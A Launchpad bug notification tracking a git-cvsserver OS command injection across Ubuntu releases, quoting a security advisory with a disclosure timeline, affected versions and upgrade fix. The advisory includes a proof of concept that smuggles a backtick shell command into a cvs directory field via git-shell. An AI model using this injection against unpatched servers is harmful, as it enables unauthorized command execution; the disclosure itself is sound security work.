** Also affects: git (Ubuntu Artful) Importance: Undecided Status: New
** Also affects: git (Ubuntu Trusty) Importance: Undecided Status: New ** Also affects: git (Ubuntu Xenial) Importance: Undecided Status: New ** Also affects: git (Ubuntu Zesty) Importance: Undecided Status: New -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1719740 Title: [DSA 3984-1] Git cvsserver OS Command Injection Status in git package in Ubuntu: In Progress Status in git source package in Trusty: In Progress Status in git source package in Xenial: In Progress Status in git source package in Zesty: In Progress Status in git source package in Artful: In Progress Bug description: From oss-security[1]: [ Authors ] joernchen <joernchen () phenoelit de> Phenoelit Group (http://www.phenoelit.de) [ Affected Products ] Git before 2.14.2, 2.13.6, 2.12.5, 2.11.4 and 2.10.5 (git-cvsserver) https://git-scm.com [ Vendor communication ] 2017-09-08 Sent vulnerability details to the git-security list 2017-09-09 Acknowledgement of the issue, git maintainers ask if a patch could be provided 2017-09-10 Patch is provided 2017-09-11 Further backtick operations are patched by the git maintainers, corrections on the provided patch 2017-09-11 Revised patch is sent out 2017-09-11 Jeff King proposes to drop `git-cvsserver`'s default invocation from `git-shell` 2017-09-22 Draft release for git 2.14.2 is created including the fixes 2017-09-26 Release of this advisory, release of fixed git versions [ Description ] The `git` subcommand `cvsserver` is a Perl script which makes excessive use of the backtick operator to invoke `git`. Unfortunately user input is used within some of those invocations. It should be noted, that `git-cvsserver` will be invoked by `git-shell` by default without further configuration. [ Example ] Below a example of a OS Command Injection within `git-cvsserver` triggered via `git-shell`: =====8<===== [git@...t ~]$ cat .ssh/authorized_keys command="git-shell -c \"$SSH_ORIGINAL_COMMAND\"" ssh-rsa AAAAB3NzaC .... [joernchen@...t ~]$ ssh git@...alhost cvs server Root /tmp E /tmp/ does not seem to be a valid GIT repository E error 1 /tmp/ is not a valid repository Directory . `id>foooooo` add fatal: Not a git repository: '/tmp/' Invalid module '`id>foooooo`' at /usr/lib/git-core/git-cvsserver line 3807, <STDIN> line 4. [joernchen@...t ~]$ [git@...t ~]$ cat foooooo uid=619(git) gid=618(git) groups=618(git) [git@...t ~]$ =====>8===== [ Solution ] Upgrade to one of the following git versions: * 2.14.2 * 2.13.6 * 2.12.5 * 2.11.4 * 2.10.5 [ end of file ] ------------------- No CVE has been assigned yet, but a fix has been released upstream and as seen above, the fixes are already in Debian. [1] http://www.openwall.com/lists/oss-security/2017/09/26/9 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/git/+bug/1719740/+subscriptions _______________________________________________ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp